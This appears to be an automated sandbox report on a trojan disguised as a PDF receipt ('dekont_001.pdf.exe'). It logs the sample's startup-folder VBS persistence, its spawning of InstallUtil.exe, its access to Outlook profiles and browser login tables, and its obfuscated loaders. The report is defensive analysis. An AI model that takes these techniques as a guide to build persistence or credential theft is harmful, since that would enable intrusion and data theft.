Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs"

Source: dekont_001.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: dekont_001.pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: InstallUtil.exe, 00000001.00000002.4215771932.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.00000000030C6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: dekont_001.pdf.exe

ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

File read: C:\Users\user\Desktop\dekont_001.pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\dekont_001.pdf.exe "C:\Users\user\Desktop\dekont_001.pdf.exe"
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\RequiredContract.exe "C:\Users\user\AppData\Roaming\RequiredContract.exe"
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\RequiredContract.exe "C:\Users\user\AppData\Roaming\RequiredContract.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: dekont_001.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: dekont_001.pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002C0E000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1845271222.00000000069D0000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A8A000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000035BE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002C0E000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1845271222.00000000069D0000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A8A000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000035BE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, j2m4JydgbMdCv8j2O8Y.cs

.Net Code: Type.GetTypeFromHandle(M2UEgytwayQ67lU6gRL.jjfsQtX03R(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(M2UEgytwayQ67lU6gRL.jjfsQtX03R(16777252)),Type.GetTypeFromHandle(M2UEgytwayQ67lU6gRL.jjfsQtX03R(16777284))})

.NET source code contains potential unpacker

Source: dekont_001.pdf.exe, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: dekont_001.pdf.exe, Dzrxuxeja.cs	.Net Code: Hlqkqyc System.Reflection.Assembly.Load(byte[])
Source: RequiredContract.exe.0.dr, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: RequiredContract.exe.0.dr, Dzrxuxeja.cs	.Net Code: Hlqkqyc System.Reflection.Assembly.Load(byte[])
Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
